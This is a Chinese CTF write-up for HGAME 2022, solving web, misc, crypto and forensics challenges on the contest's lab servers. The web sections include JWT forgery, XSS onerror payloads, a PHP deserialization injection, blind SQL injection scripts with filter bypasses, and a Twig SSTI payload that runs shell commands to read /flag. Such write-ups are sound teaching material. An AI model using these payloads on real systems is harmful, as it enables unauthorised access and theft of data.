新人赛,就没有存题目附件了,简单的记录一下解题过程吧
存在admin用户,随便设置一个任务,然后点击doing,抓一个GET的包
Token的格式很明显是jwt:https://jwt.io/
修改ID为1,Username为admin
发送修改后的jwt密文得到flag
import requests
import re
init_url = "https://hgame-spider.vidar.club/8983cb3acd"
link = ""
while True:
res_url = init_url + link
regex = re.compile('href="(.*?)"')
html = requests.get(url=res_url)
l = re.findall(regex, html.text)
print(res_url)
link = [i for i in l if i != '']
if len(link) == 0:
break
else:
link = link[0]
访问最后一个输出的地址,flag在响应头里面
在cheking.js中发现注释了jsfuck
直接复制到控制台回车即可得到flag
GET / HTTP/1.1
Host: shop.summ3r.top
User-Agent: Hachi-Roku
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
referer:qiumingshan.net
Cookie: flavor=Raspberry;
gasoline:100
x-real-ip:127.0.0.1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
hgame{We1com3_t0_HG@ME_2O22}
README.txt
I don't know if it's a good idea to write down all the passwords.
将password-note.txt作为字典进行爆破
明文攻击
分离出来的压缩包跟一般伪加密不同的是修改了压缩源文件数据区的全局方式标记位,使得7z等压缩包无法无视伪加密直接解压
修改压缩源文件目录区全局方式标记位为偶数即可
hgame{W0w!_y0U_Kn0w_z1p_3ncrYpt!}
hgame{ez_1mg_
另一半flag用zsteg查看一下LSB
hgame{ez_1mg_Steg4n0graphy}
通过频谱图得到密码:Yoasobi
音频LSB隐写,SlientEye解码得到一个地址
听起来是SSTV,Robot36直接听
hgame{1_c4n_5ee_the_wav}
向X轴方向移动一个像素点记为0,向Y轴方向移动一个像素点记为1
from PIL import Image
img = Image.open('flag.bmp')
width, height = img.size
bin_data = ''
num_list = []
n = 0
for w in range(width):
for h in range(height):
pix = img.getpixel((w,h))
if pix != (255, 255, 255):
#print("{} {}".format(pix, n))
num_list.append(n)
n += 1
for i in range(len(num_list)-1):
if (num_list[i+1] - num_list[i]) >= height:
bin_data += '0'
else:
bin_data += '1'
print("[+]binary data: {}".format(bin_data))
flag = ''
for i in range(0, len(bin_data), 8):
flag += chr(int(bin_data[i:i+8], 2))
print(flag)
PS C:UsersAdministratorDownloads> python .code.py
[+]binary data: 01101000011001110110000101101101011001010111101101000100011000010110111001100011001100010110111001100111010111110100110000110001011011100110010101011111001100010011010101011111011001100111010101101110001011000101111100110001001101010110111000100111011101000101111100110001011101000011111101111101
hgame{Danc1ng_L1ne_15_fun,_15n't_1t?}
类似盲文,但是其实是摩斯码
?替换为.?替换为-?替换为/然后逆序处理
http://www.zhongguosou.com/zonghe/moErSiCodeConverter.aspx
摩斯转换得到Hex码
466642756645466E6D4C73364433736959744C3658327034694E306364536C796B6D3972514E396F4D53316A6B7339724B3252366B4C38686F72303D
Hex转字符得到:
FfBufEFnmLs6D3siYtL6X2p4iN0cdSlykm9rQN9oMS1jks9rK2R6kL8hor0=
维吉尼亚解密(密钥为:hgame)得到:
YzBibXZnaHl6X3swUmF6X2d4eG0wdGhrem9fMG9iMG1fdm9rY2N6dF8hcn0=
base64解码得到:
c0bmvghyz_{0Raz_gxxm0thkzo_0ob0m_vokcczt_!r}
栅栏密码(每组字数:22)得到:
cbvhz{Rzgx0hz_o0_ocz_r0mgy_0a_xmtko0bmvkct!}
凯撒密码解密(位移21)得到:
hgame{Welc0me_t0_the_w0rld_0f_crypt0graphy!}
根据给出的密文,明文,以及加密算法,推出key,然后利用key解flag.enc
import os
def if_length(ori_content, enc_content, match_result):
if len(ori_content) == len(enc_content):
match_result = True
else:
match_result = False
return match_result
def if_match(ori_name, enc_name):
match_result = True
ori_path = ori_folder + '/' + ori_name
enc_path = enc_folder + '/' + enc_name
with open(ori_path, 'r') as f:
ori_content = f.read()
with open(enc_path, 'r') as f:
enc_content = f.read()
match_result = True
if match_result:
match_result = if_length(ori_content, enc_content, match_result)
if match_result:
for i in range(len(ori_content)):
if ori_content[i] == enc_content[i]:
continue
elif ori_content[i].isupper() and enc_content[i].isupper():
continue
elif ori_content[i].islower() and enc_content[i].islower():
continue
else:
match_result = False
return match_result
def match_process(ori_folder, enc_folder):
all_match = []
original_list = os.listdir(ori_folder)
encrypt_list = os.listdir(enc_folder)
for ori_name in original_list:
for enc_name in encrypt_list:
match_result = if_match(ori_name, enc_name)
if match_result:
ori_path = ori_folder + '/' + ori_name
enc_path = enc_folder + '/' + enc_name
match_group = [ori_path, enc_path]
all_match.append(match_group)
encrypt_list.remove(enc_name)
else:
continue
return all_match
def decrypt(ori_data, enc_data, enc_flag):
keys = []
for i in range(len(enc_data)):
key = ord(enc_data[i]) - ord(ori_data[i])
keys.append(key)
result = ""
enc_data = enc_flag
for i in range(len(enc_data)):
if enc_data[i].isupper():
result += chr((ord(enc_data[i]) - ord('A') - keys[i]) % 26 + ord('A'))
elif enc_data[i].islower():
result += chr((ord(enc_data[i]) - ord('a') - keys[i]) % 26 + ord('a'))
else:
result += enc_data[i]
return result
if __name__ == '__main__':
ori_folder = './original'
enc_folder = './encrypt'
enc_flag = open('./flag.enc', 'r').read()
match_list = match_process(ori_folder, enc_folder)
for match_group in match_list:
with open(match_group[0], 'r') as f:
ori_data = f.read()
with open(match_group[1], 'r') as f:
enc_data = f.read()
flag = decrypt(ori_data, enc_data, enc_flag)
print("{:<30}{:<30}{:<30}".format(match_group[0], match_group[1], flag))
hgame{D0_y0u_kn0w_'Kn0wn-pla1ntext_attack'?}
CVE-2021-40438
这里倒是不用还原map文件,直接访问这个
data:application/json;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIndlYnBhY2s6Ly8uL3NyYy92aWV3cy9GbDRnXzFzX2hlcjMudnVlIl0sIm5hbWVzIjpbXSwibWFwcGluZ3MiOiI7QUF5QkE7RUFDQSxZQUFBO0VBQ0Esa0JBQUE7RUFDQSxhQUFBO0VBQ0Esc0JBQUE7RUFDQSx1QkFBQTtFQUNBLG1CQUFBO0FBQ0E7QUFDQTtFQUNBLFdBQUE7RUFDQSxZQUFBO0VBQ0EsYUFBQTtFQUNBLHNCQUFBO0VBQ0EsdUJBQUE7RUFDQSxtQkFBQTtBQUNBO0FBQ0E7RUFDQSxXQUFBO0VBQ0EsWUFBQTtBQUNBOztBQUVBLFFBQUE7QUFDQTtFQUNBLHNCQUFBO0VBQ0EsdUJBQUE7RUFDQSxxQkFBQTtFQUNBLHNCQUFBO0VBQ0EsY0FBQTtFQUNBLGVBQUE7RUFDQSxxQkFBQTtFQUNBLDhMQUFBO0VBQ0EsaUJBQUE7RUFDQSxnQkFBQTtFQUNBLGNBQUE7RUFDQSxvQkFBQTtFQUNBLGtCQUFBO0VBQ0EsbUNBQUE7RUFDQSwrQkFBQTtFQUNBLDhDQUFBO0VBQ0EsaURBQUE7RUFDQSxpQkFBQTtFQUNBLHlCQUFBO0VBQ0EsMEJBQUE7QUFDQTtBQUVBO0VBQ0EseUJBQUE7RUFDQSxXQUFBO0VBQ0EsK0JBQUE7QUFDQTtBQUVBO0FBQ0E7SUFDQSxtQkFBQTtJQUNBLGtCQUFBO0FBQ0E7QUFDQTtBQUVBO0VBQ0Esa0JBQUE7RUFDQSxZQUFBO0VBQ0EsWUFBQTtFQUNBLFdBQUE7RUFDQSxZQUFBO0FBQ0EiLCJzb3VyY2VzQ29udGVudCI6WyI8dGVtcGxhdGU+XG4gIDxoMT57e2ZpbGlpaWxpbGlsNGd9fTwvaDE+XG48L3RlbXBsYXRlPlxuXG48c2NyaXB0PlxuXG5leHBvcnQgZGVmYXVsdCB7XG4gIGRhdGEoKSB7XG4gICAgcmV0dXJuIHtcbiAgICAgIGZpbGlpaWxpbGlsNGc6ICdZVWRrYUdKWFZqZFNSRUoxWkVZNWJVMUlTVFZhV0ZKbVRXdzVSR0pGT1hwTk1UbFVUVWhXZVZreVZtWmlWVUozWmxFOVBRbz0nXG4gICAgfVxuICB9XG59XG48L3NjcmlwdD5cblxuPHN0eWxlPlxuaHRtbCwgYm9keSB7XG4gIGhlaWdodDogMTAwJTtcbiAgbWFyZ2luOiAwO1xuICBwYWRkaW5nOiAwO1xuICBvdmVyZmxvdzogaGlkZGVuO1xufVxuPC9zdHlsZT5cblxuPHN0eWxlIHNjb3BlZD5cbi5ob21lIHtcbiAgaGVpZ2h0OiAxMDAlO1xuICBwb3NpdGlvbjogcmVsYXRpdmU7XG4gIGRpc3BsYXk6IGZsZXg7XG4gIGZsZXgtZGlyZWN0aW9uOiBjb2x1bW47XG4gIGp1c3RpZnktY29udGVudDogY2VudGVyO1xuICBhbGlnbi1pdGVtczogY2VudGVyO1xufVxuLnBsYXllciB7XG4gIHdpZHRoOiAxMDAlO1xuICBoZWlnaHQ6IDEwMCU7XG4gIGRpc3BsYXk6IGZsZXg7XG4gIGZsZXgtZGlyZWN0aW9uOiBjb2x1bW47XG4gIGp1c3RpZnktY29udGVudDogY2VudGVyO1xuICBhbGlnbi1pdGVtczogY2VudGVyO1xufVxuaWZyYW1lIHtcbiAgd2lkdGg6IDEwMCU7XG4gIGhlaWdodDogMTAwJTtcbn1cblxuLyogQ1NTICovXG4uYnV0dG9uLTgxIHtcbiAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZjtcbiAgYm9yZGVyOiAwIHNvbGlkICNlMmU4ZjA7XG4gIGJvcmRlci1yYWRpdXM6IDEuNXJlbTtcbiAgYm94LXNpemluZzogYm9yZGVyLWJveDtcbiAgY29sb3I6ICMwZDE3MmE7XG4gIGN1cnNvcjogcG9pbnRlcjtcbiAgZGlzcGxheTogaW5saW5lLWJsb2NrO1xuICBmb250LWZhbWlseTogXCJCYXNpZXIgY2lyY2xlXCIsLWFwcGxlLXN5c3RlbSxzeXN0ZW0tdWksXCJTZWdvZSBVSVwiLFJvYm90byxcIkhlbHZldGljYSBOZXVlXCIsQXJpYWwsXCJOb3RvIFNhbnNcIixzYW5zLXNlcmlmLFwiQXBwbGUgQ29sb3IgRW1vamlcIixcIlNlZ29lIFVJIEVtb2ppXCIsXCJTZWdvZSBVSSBTeW1ib2xcIixcIk5vdG8gQ29sb3IgRW1vamlcIjtcbiAgZm9udC1zaXplOiAxLjFyZW07XG4gIGZvbnQtd2VpZ2h0OiA2MDA7XG4gIGxpbmUtaGVpZ2h0OiAxO1xuICBwYWRkaW5nOiAxcmVtIDEuNnJlbTtcbiAgdGV4dC1hbGlnbjogY2VudGVyO1xuICB0ZXh0LWRlY29yYXRpb246IG5vbmUgIzBkMTcyYSBzb2xpZDtcbiAgdGV4dC1kZWNvcmF0aW9uLXRoaWNrbmVzczogYXV0bztcbiAgdHJhbnNpdGlvbjogYWxsIC4xcyBjdWJpYy1iZXppZXIoLjQsIDAsIC4yLCAxKTtcbiAgYm94LXNoYWRvdzogMHB4IDFweCAycHggcmdiYSgxNjYsIDE3NSwgMTk1LCAwLjI1KTtcbiAgdXNlci1zZWxlY3Q6IG5vbmU7XG4gIC13ZWJraXQtdXNlci1zZWxlY3Q6IG5vbmU7XG4gIHRvdWNoLWFjdGlvbjogbWFuaXB1bGF0aW9uO1xufVxuXG4uYnV0dG9uLTgxOmhvdmVyIHtcbiAgYmFja2dyb3VuZC1jb2xvcjogIzFlMjkzYjtcbiAgY29sb3I6ICNmZmY7XG4gIHRyYW5zaXRpb246IGFsbCAuMnMgZWFzZS1pbi1vdXQ7XG59XG5cbkBtZWRpYSAobWluLXdpZHRoOiA3NjhweCkge1xuICAuYnV0dG9uLTgxIHtcbiAgICBmb250LXNpemU6IDEuMTI1cmVtO1xuICAgIHBhZGRpbmc6IDFyZW0gMnJlbTtcbiAgfVxufVxuXG5idXR0b24ge1xuICBwb3NpdGlvbjogYWJzb2x1dGU7XG4gIHdpZHRoOiAzMDBweDtcbiAgaGVpZ2h0OiA2MHB4O1xuICBib3R0b206IDIwJTtcbiAgYm9yZGVyOiBub25lO1xufVxuPC9zdHlsZT5cbiJdLCJzb3VyY2VSb290IjoiIn0=
>>> from base64 import *
>>> b64decode('YUdkaGJXVjdSREJ1ZEY5bU1ISTVaWFJmTWw5RGJFOXpNMTlUTUhWeVkyVmZiVUJ3ZlE9PQo=')
b'aGdhbWV7RDBudF9mMHI5ZXRfMl9DbE9zM19TMHVyY2VfbUBwfQ==
'
>>> b64decode('aGdhbWV7RDBudF9mMHI5ZXRfMl9DbE9zM19TMHVyY2VfbUBwfQ==')
b'hgame{D0nt_f0r9et_2_ClOs3_S0urce_m@p}'
直接获取类名元素为content的
flag是通过var声明的,那么直接列出当前页面的所有的全局变量
这样就可以得到flag的值了,接下来就是xss触发,简单测试下发现过滤并不多,直接使用
<img src=x onerror="document.getElementsByClassName('content')[0].innerText=Object.keys(window)">
<img src=x onerror="document.getElementsByClassName('content')[0].innerText=F149_is_Here">
下载源码,登录这里绕过is_numeric()即可,bypass网上方法很多
username=adm1n&password=1080%00
继续分析源码
{
"name":"mochu7"
}
可以看到对键值的内容进行了序列化存储,键名内容不变,中间用|分隔
继续分析源码
重点在这里的decode函数,对|后部分的数据进行反序列化,但是如果键名部分也有|符号,就会对键名|之后的部分反序列化
<?php
class Evil {
public $file='/flag';
}
$obj = new Evil();
var_dump(serialize($obj));
//O:4:"Evil":1:{s:4:"file";s:5:"/flag";}
?>
name|O:4:"Evil":1:{s:4:"file";s:5:"/flag";}
error.php对传入的code参数进行了过滤
fuzz一下sql关键字,长度为473的包都是被过滤的
不过这里的过滤是直接替换为空,可双写绕过
可进行时间盲注,过滤的地方用双写绕过即可
import requests
printable_str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"
burp0_url = "http://121.43.141.153:60056/error.php?code="
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
result = ""
for i in range(50):
for s in printable_str:
# payload = "if(ascii(mid(database(),{},1))like({}),sleep(1),1)".format(i, ord(s))
# payload = "if(ascii(mid((selselectect/*/**/*/group_concat(table_name)/*/**/*/frfromom/*/**/*/infoorrmation_schema.tables/*/**/*/whewherere/*/**/*/(table_schema)like('pokemon')),{},1))like({}),sleep(1),0)".format(i, ord(s))
# payload = "if(ascii(mid((selselectect/*/**/*/group_concat(column_name)/*/**/*/frfromom/*/**/*/infoorrmation_schema.columns/*/**/*/whewherere/*/**/*/(table_name)like('fllllllllaaaaaag')),{},1))like({}),sleep(1),0)".format(i, ord(s))
payload = "if(ascii(mid((selselectect/*/**/*/flag/*/**/*/frfromom/*/**/*/pokemon.fllllllllaaaaaag),{},1))like({}),sleep(1),1)".format(i, ord(s))
resp = requests.get(url=burp0_url+payload, headers=burp0_headers)
if resp.elapsed.seconds > 3:
result += s
print("[+]{}".format(result))
else:
continue
PS打开,用钢笔选中每块选区,然后拼起来,加大曝光,得到如下
直接扫不出来,二维码中间貌似被涂黑过,有点干扰。尝试用二维码修复站模糊识别:https://merricx.github.io/qrazybox/
看样子像是一个链接,用搜索引擎语法找
找到出题人的github,在github首页找到出题人的博客地址
然后在出题人博客的友联里面找到了鸿贵安
https://homeginan.homeboyc.cn
b09nyMj9cOZ3aB8KUcnh46nIi9fGTIL6XjnnW1/sj/nUR1BFYkf0JwB0qjcQhcCy7dxtsHqznOMkt6XEGKD8y5K5whenAcwuiT/Rue+snORVWAorXsB3ZGcITuFLEIThbx4/vh5E/Wk4R8qhNcFh5bwSSmwdULVuwBrJ5H3+kBOsYafEqP8RDX3sOdXTj80V8Puq+TNbXAMhxvdLGkkcBQ==
b09nyMj9cOZ3aB8KUcnh46nIi9fGTIL6XjnnW1/sj/nUR1BFYkf0JwB0qjcQhcCylCR8cGp6MhxD4pTEACGutFVYCitewHdkZwhO4UsQhOFvHj++HkT9aThHyqE1wWHlvBJKbB1QtW7AGsnkff6QE+wqMT6fADfdpBQNOzg4DYA=
Derive PBKDF2 key的passphrase要猜,根据博客上给出的信息
那么生日应该是:20020816
试了一下发现还不对,最后经过多次尝试得到密码为:hgame20020816
hgame{Wh0_4m_1?I_like_S0ciaI_En9in33ring}
第一步套娃解压,Python脚本简单处理下即可
import zipfile
import os
def decompress(files_list:list) -> list:
dec_files_list = []
for file_name in files_list:
if '.zip' in file_name:
zf = zipfile.ZipFile(file_name)
zf.extractall(os.getcwd())
dec_files_list += zf.namelist()
else:
continue
return dec_files_list
if __name__ == '__main__':
files_list = os.listdir()
while True:
dec_files_list = decompress(files_list)
if len(dec_files_list) == 0:
break
else:
files_list = dec_files_list
得到三个经典视频,在agfl.mp4和lagf.mp4的视频末尾有条码
结合提示给的两个条码
给了图床链接的两个条码用下面这个识别:
另外两个用另一个条码识别工具站:
一共得到四张base64编码过的图片字节流
将得到的四张图片用PS简单拼接一下即可
hgame{Do_y0U_lIk3_MazE5?}
查看浏览器历史记录找到个7z压缩包
导出、解压发现是WannaRen勒索病毒加密的文件
一键解密 火绒推出WannaRen勒索病毒解密工具:https://www.huorong.cn/info/1586440740454.html
得到新佛曰论禅编码
新佛曰:諸隸僧降閦吽諸陀摩閦隸僧缽薩閦願耨願嘚願諦閦諸囉閦嘇劫嘇閦亦伏迦薩摩愍心薩摩降眾閦聞諸阿我閦嚩諸寂嘚咒咒莊閦我薩闍嚩劫閦嘇薩迦聞色須嘇聞我吽伏閦是般如閦
新佛曰论禅解码:http://hi.pcmoe.net/buddha.html
hgame{F1srt_STep_0f_MeM0rY_F0renS1cs}
每隔10个像素点就有一个像素位置比较突出
有点像缩略图,通过stegsolve也可发现确实是有一些信息,很有规律的排布,用Python简单提取下即可
from PIL import Image
img = Image.open('1.png')
width, height = img.size
pixs_list = []
for w in range(5, width, 11):
for h in range(5, height, 11):
pix = img.getpixel((w, h))
pixs_list.append(pix)
#分解下pixs_list的长度,就可以得到生成图片的宽高
new_width, new_height = 215, 215
new_img = Image.new('RGB', (new_width, new_height))
idx = 0
for n_w in range(new_width):
for n_h in range(new_height):
new_img.putpixel((n_w, n_h), pixs_list[idx])
idx += 1
new_img.save('ok.png')
new_img.show()
得到信息
st = 1
a = 9
b = 39
暂时不知道什么意思,图片上有一些带颜色小点很突出,拖进PS分析发现间隔也是很规律,每个点间隔4个像素点
from PIL import Image
img = Image.open('ok.png')
width, height = img.size
pixs_list = []
for w in range(2, width, 5):
for h in range(2, height, 5):
pix = img.getpixel((w, h))
pixs_list.append(pix)
#分解pixs_list的长度,
new_width, new_height = 43, 43
new_img = Image.new('RGB', (new_width, new_height))
idx = 0
for n_w in range(new_width):
for n_h in range(new_height):
new_img.putpixel((n_w, n_h), pixs_list[idx])
idx += 1
new_img.save('ok1.png')
new_img.show()
看到这里了看过Arnold变换(猫映射)置乱效果图的师傅应该会觉得比较像,前面的到a=9、b=39是Arnold变换矩阵参数,st=1是周期
from PIL import Image
img = Image.open('ok1.png')
if img.mode == "P":
img = img.convert("RGB")
assert img.size[0] == img.size[1]
dim = width, height = img.size
st = 1
a = 9
b = 39
for _ in range(st):
with Image.new(img.mode, dim) as canvas:
for nx in range(img.size[0]):
for ny in range(img.size[0]):
y = (ny - nx * a) % width
x = (nx - y * b) % height
canvas.putpixel((y, x), img.getpixel((ny, nx)))
canvas.show()
canvas.save('ok2.png')
很像nipet,尝试npiet执行一下
原图是附加了一个zip的字节流的,分离出来得到两个list,根据提示把每一项的加起来
from binascii import *
list1 = [776686, 749573, 6395443, 2522866, 279584, 587965, 4012670, 1645156, 2184634]
list2 = [6065523, 6419830, 1421837, 5103682, 5963053, 2842996, 1113825, 1594064, 4578755]
flag = ''
for i in range(len(list1)):
flag += unhexlify(hex(list1[i]+list2[i])[2:]).decode()
print(flag)
hgame{wH@t_4_AM4Z1N9_1m4g3}
PS:这样的最后处理得到flag,感觉会有挺多的非预期
一开始以为是SSRF,打了半天在hint提供的信息最下面发现了这个
测试一下
Twing v3.3.7的模板,找下漏洞
SSTI payload
{{["id"]|map("system")}}
{{["id"]|map("passthru")}}
{{["id"]|map("exec")}} // 无回显
尝试读取的时候发现过滤了cat,简单绕过一下即可
返回内容不能有hgame?
base64编码一下返回
/redirect.php?url={{["head /flag | base64"]|map("system")}}
然后这里记录一下我一开始使用的读取方法
redirect.php?url={{["/usr/local/bin/php /flag | base64"]|map("system")}}
PS C:UsersAdministrator> php -r "var_dump(base64_decode('aGdhbWV7IVR3MTktUzV0MX4xc15zMDBPME9faW50ZXIzc3QxbjV+IX0K'));"
Command line code:1:
string(42) "hgame{!Tw19-S5t1~1s^s00O0O_inter3st1n5~!}"
这三个js文件都有map文件,可以用reverse-sourcemap还原源码
参考:https://www.freebuf.com/articles/web/276810.html
得到源码可自行分析
不过这里的漏洞,黑盒就测试出来了
注册的时候注意下有一些限制,最好用burp改包注册,注意用户名长度和密码长度即可成功注册
注册成功后登录能看到用户的一些信息
首先任意下单一个买得起的,支付,看看这个过程
支付后,账户拥有的余额减少了20
然后发现这个已支付的订单可以删除
删除完之后发现,之前减去的余额返回到了账户
有增加对应取消订单的价格,抓包分析下传参
只传了一个订单的id,尝试修改为下单好的更大金额的订单的id,比如flag的订单id
增加了flag订单的金额到账户余额上,余额够了,直接买flag,支付后回到订单页面得到flag
本次HGAME唯一一道拿到血的题目呜呜呜,虽然是三血,纪念一下
源码里面给了个hint的图片
username只有admin和test两个用户,并且可以闭合这里形成注入
{"username":"admin' and '1","password":"mochu7"}
这里需要注意的是,注入语法正常的时候返回:{"msg":"success!"},注入语法错误,或者用户名错误的都返回:{"msg":"invalid username or password"}
比较难测试区分的就是分辨是注入语句不对,还是这个关键字被过滤了,因为都是返回{"msg":"invalid username or password"},得一点点摸索
经过多次测试发现这里if应该是行不通的
那么可以参考我以前的文章:记一次MySQL注入绕过
利用case when [express] then [x] else [y] end代替if做条件判断
{"username":"admin'and case when 1=1 then 1 else 0 end and '1","password":"mochu7"}
直接查admin的password
import requests
asc_str = '0123456789abcdef'
burp0_url = "http://81906c3039.login.summ3r.top:60067/login"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json"}
password = ""
for i in range(1, 35):
for s in asc_str:
payload = "admin'and case when substr(password,{},1)='{}' then 1 else 0 end and '1".format(i, s)
burp0_json={"password": "mochu7", "username": payload}
resp = requests.post(burp0_url, headers=burp0_headers, json=burp0_json)
if 'success' in resp.text:
password += s
print(password)
登录admin账号,然后得到flag
从结构上来看应该是apng,用apng disassembler分离
看起来一样的图片,大小不一样,猜测盲水印
得到压缩包密码:4C*9wfg976
拼图,用PS
将得到的二维码用二维码在线站扫:https://products.aspose.app/barcode/recognize#
零宽度字符隐写:https://330k.github.io/misc_tools/unicode_steganography.html
hgame{1_W4nT_T0_p1Ay_r0Tten}
题目附件是RAR压缩的,使用winrar解压
ntfsstreamseditor扫一下,发现NTFS流隐藏的文件
秋名山车神Atom开车啦
4 up left down up right down up left up down right down up left down up right down up left up down right down up left down up right up down left up down right down up left down up right down up left up down right down up left up down down up up down right down up left up down right up down left up down right down up left up down right up
gift.mp4视频中,出题人切屏的时候得到一个信息
gift2.avi极大可能使用了msu steg,但是msu steg解视频文件需要一个数字密码
NTFS流隐藏的文件提到的是开车,然后一个4开头,之后就是上下左右的方向,用笔画了一下
画来画去得到一个H形状,联想到提到车,猜测可能是手动挡车的挡位
从4档开始,始终在1-4档移动,猜测可能是四进制,把移动过程中经过的挡位记录下来
得到一串数字,Python简单处理得到一串数字
from binascii import *
data = '424142414231424141214131413'
quater_num = ''
for n in data:
quater_num += str(int(n)-1)
flag = unhexlify(hex(int(quater_num, 4))[2:])
print(flag)
PS C:UsersAdministratorDownloadsgiftgift> python .code.py
b'7767122'
MSU Stego
hgame{Q1ng_R3n_J1e_Da_Sh4_CTF}